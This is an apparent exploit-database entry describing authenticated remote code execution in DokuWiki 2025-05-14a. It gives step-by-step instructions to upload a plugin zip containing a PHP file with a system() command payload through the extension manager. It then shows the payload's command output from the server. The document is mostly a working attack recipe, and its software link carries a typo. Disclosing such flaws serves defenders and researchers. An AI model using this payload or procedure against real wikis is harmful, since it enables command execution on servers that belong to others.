# Exploit Title: DokuWiki 2025-05-14a Remote Code Execution via File Upload Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: hhttps://github.com/dokuwiki/dokuwiki/releases/download/release-2025-05-14a/dokuwiki-2025-05-14a.zip
# Version : 2025-05-14a
# Date : 06/10/2025


1. Log in with valid admin credentials.
2. Click Extension Manager > Manually Install
3. Upload hello.zip file inside hello.php
Inject Payload
<?php echo system('id'); ?>
4. Click Install
5. Navigate to: https://127.0.0.1/DokuWiki/lib/plugins/hello/hello.php
6. Verify Results
uid=1003(DokuWiki) gid=1004(DokuWiki) groups=1004(DokuWiki)